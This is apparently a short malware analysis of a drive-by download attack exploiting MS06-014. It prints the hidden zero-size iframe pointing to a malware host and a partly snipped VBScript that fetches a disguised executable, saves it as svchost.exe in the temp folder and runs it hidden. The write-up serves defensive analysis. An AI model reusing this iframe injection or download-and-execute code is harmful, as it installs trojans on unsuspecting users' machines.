Multiple exploits initially triggered by i-frame which redirects to the malware site:
iframe src=http://www.goldunix.com/hker.htm widht=0 height=0>/iframe> ____________________________________________________________________________ hker.htm - does two things, 1) downloads test.htm, which is really an executable file in disquise 2) sets up to create svchost.exe Here is the code in the hker.htm file:
__________________________________________________________________________
script language="VBScript">
on error resume next
dl = "http://www.goldunix.com/test.htm"
.....snip.....
x.Send
fname1="svchost.exe"
set F = df.createobject("Scripting.FileSystemObject","")
set tmp = F.GetSpecialFolder(2)
S.open
fname1= F.BuildPath(tmp,fname1)
S.write x.responseBody
S.savetofile fname1,2
S.close
set Q = df.createobject("Shell.Application","")
Q.ShellExecute fname1,"","","open",0
/script>
head>
title>Hello!!!/title>
_________________________________________________________________________
Letting test.html run: the following happens in the background and the firewall alerts to the outbound connection. test.html copies itself as svchost.exe into c:\..\temp (typical malware action)  _____________________________________________________________ svchost.exe (aka test.htm) is the downloader and attempts to connect out to the internet:  _____________________________________________________________ Same old tricks attempting to install a trojan. Reference: Microsoft Security Bulletin MS06-014 Vulnerability in the Microsoft Data Access Components (MDAC) Function |
